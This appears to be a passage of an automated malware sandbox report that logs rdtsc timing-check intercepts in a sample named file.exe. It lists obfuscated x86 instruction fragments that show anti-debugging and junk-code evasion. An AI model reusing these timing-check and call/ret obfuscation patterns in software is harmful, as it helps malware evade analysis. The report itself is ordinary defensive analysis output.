                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6254FF second address: 625504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626321 second address: 62632B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F99FD381EE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62632B second address: 626381 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov di, 3CE2h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F99FCCDC7D8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 cmc 0x0000002a mov dword ptr [ebp+122D1A18h], edx 0x00000030 mov edi, dword ptr [ebp+122D3975h] 0x00000036 push 00000000h 0x00000038 add dword ptr [ebp+122D18DEh], edi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F99FCCDC7E0h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626381 second address: 626386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62B4A0 second address: 62B4BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62B4BD second address: 62B4DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c jbe 00007F99FD381EE6h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62B63E second address: 62B645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D438 second address: 62D441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D441 second address: 62D447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D666 second address: 62D670 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D670 second address: 62D674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F40C second address: 62F412 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F412 second address: 62F440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F99FCCDC7D6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edi 0x00000011 jng 00007F99FCCDC7D6h 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F99FCCDC7E4h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630720 second address: 63072A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99FD381EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63072A second address: 630734 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99FCCDC7DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631A1D second address: 631A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631A23 second address: 631A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F99FCCDC7EAh 0x0000000b jmp 00007F99FCCDC7E4h 0x00000010 popad 0x00000011 nop 0x00000012 mov bl, al 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F99FCCDC7D8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 xor bh, FFFFFFE9h 0x00000033 push 00000000h 0x00000035 mov ebx, 44A34F13h 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631A73 second address: 631A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jns 00007F99FD381EE6h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631A88 second address: 631A9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63396E second address: 633986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EF4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633986 second address: 6339FE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99FCCDC7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F99FCCDC7D8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov bl, ch 0x0000002b mov dword ptr [ebp+12454B32h], edi 0x00000031 push 00000000h 0x00000033 mov bx, 3A01h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F99FCCDC7D8h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 mov ebx, dword ptr [ebp+122D3855h] 0x00000059 xchg eax, esi 0x0000005a jmp 00007F99FCCDC7DFh 0x0000005f push eax 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 push edx 0x00000064 pop edx 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 634ACD second address: 634B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F99FD381EE8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov edi, 133E1800h 0x00000028 push 00000000h 0x0000002a xor dword ptr [ebp+122D2F92h], esi 0x00000030 push 00000000h 0x00000032 mov ebx, dword ptr [ebp+122D18B6h] 0x00000038 push eax 0x00000039 jnp 00007F99FD381EF0h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635961 second address: 635967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6378FC second address: 637900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63897C second address: 638985 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639B4F second address: 639B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641F51 second address: 641F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641F57 second address: 641F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6420A5 second address: 6420AF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99FCCDC7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6420AF second address: 6420D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF7h 0x00000007 pushad 0x00000008 jnp 00007F99FD381EE6h 0x0000000e jns 00007F99FD381EE6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D5F7 second address: 64D607 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99FCCDC7D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D607 second address: 64D60B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CEDD second address: 64CEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CEE1 second address: 64CEE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CEE5 second address: 64CEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D046 second address: 64D067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FD381EF0h 0x00000009 popad 0x0000000a push ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F99FD381EE6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D067 second address: 64D06B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D1D4 second address: 64D202 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99FD381F00h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F99FD381EF8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F99FD381EEAh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D202 second address: 64D206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7EB8 second address: 5D7EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7EBD second address: 5D7EE5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99FCCDC7E2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F99FCCDC7E0h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655BA6 second address: 655BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655BAA second address: 655BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655BAE second address: 655BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F99FD381EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F99FD381EF5h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655BD5 second address: 655C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FCCDC7E7h 0x00000009 popad 0x0000000a jmp 00007F99FCCDC7E6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655C07 second address: 655C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655EEA second address: 655EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656182 second address: 656188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656188 second address: 65618E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65618E second address: 65619F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007F99FD381EEEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65619F second address: 6561C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F99FCCDC7E7h 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F99FCCDC7D6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656300 second address: 656306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656858 second address: 65685C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656B7E second address: 656B98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF5h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656B98 second address: 656BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C6F3 second address: 65C6FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F99FD381EE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C6FF second address: 65C70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F99FCCDC7DAh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C70E second address: 65C74A instructions: 0x00000000 rdtsc 0x00000002 js 00007F99FD381EFCh 0x00000008 jmp 00007F99FD381EF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F99FD381EF6h 0x00000014 jnp 00007F99FD381EE6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C8E2 second address: 65C8F1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99FCCDC7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CA35 second address: 65CA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F99FD381EF2h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F99FD381EE6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CA58 second address: 65CA5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CA5C second address: 65CA65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CBDB second address: 65CBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CD39 second address: 65CD4C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F99FD381EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jnl 00007F99FD381EE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CE75 second address: 65CE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CE7B second address: 65CE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FD381EEDh 0x00000009 popad 0x0000000a jmp 00007F99FD381EECh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CE99 second address: 65CEA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65D019 second address: 65D01F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65D01F second address: 65D04C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99FCCDC7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F99FCCDC7DEh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jo 00007F99FCCDC7FEh 0x00000018 jmp 00007F99FCCDC7DAh 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627314 second address: 627377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FD381EF4h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov dword ptr [ebp+12454B32h], edi 0x00000016 mov edx, dword ptr [ebp+122D3905h] 0x0000001c lea eax, dword ptr [ebp+1248707Eh] 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F99FD381EE8h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c mov dx, 7681h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F99FD381EECh 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627377 second address: 62737B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62737B second address: 627381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627381 second address: 608B36 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99FCCDC7DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007F99FCCDC7E3h 0x00000012 mov dword ptr [ebp+1246AD43h], eax 0x00000018 pop edi 0x00000019 call dword ptr [ebp+122D25C6h] 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627468 second address: 62746D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627579 second address: 627584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F99FCCDC7D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627810 second address: 627815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627815 second address: 473BCB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99FCCDC7D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dh, FEh 0x0000000f push dword ptr [ebp+122D0B81h] 0x00000015 mov di, bx 0x00000018 call dword ptr [ebp+122D185Bh] 0x0000001e pushad 0x0000001f clc 0x00000020 xor eax, eax 0x00000022 pushad 0x00000023 mov dword ptr [ebp+122D3537h], ecx 0x00000029 mov di, 2E5Eh 0x0000002d popad 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 cld 0x00000033 mov dword ptr [ebp+122D37D1h], eax 0x00000039 mov dword ptr [ebp+122D372Fh], ecx 0x0000003f mov esi, 0000003Ch 0x00000044 jmp 00007F99FCCDC7E7h 0x00000049 add esi, dword ptr [esp+24h] 0x0000004d ja 00007F99FCCDC7E1h 0x00000053 lodsw 0x00000055 mov dword ptr [ebp+122D3735h], ecx 0x0000005b add eax, dword ptr [esp+24h] 0x0000005f jmp 00007F99FCCDC7E6h 0x00000064 mov ebx, dword ptr [esp+24h] 0x00000068 jmp 00007F99FCCDC7E5h 0x0000006d nop 0x0000006e jnl 00007F99FCCDC7F1h 0x00000074 push eax 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 push esi 0x00000079 pop esi 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627A1F second address: 627A2E instructions: 0x00000000 rdtsc 0x00000002 js 00007F99FD381EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627B67 second address: 627B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62835E second address: 628363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62849F second address: 6284BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6284BA second address: 6284CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EEDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628686 second address: 609679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dx, ax 0x0000000b call dword ptr [ebp+122D1D1Dh] 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 jmp 00007F99FCCDC7E4h 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66139E second address: 6613A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66154C second address: 661554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661554 second address: 66155A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6616AB second address: 6616BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F99FCCDC7D6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
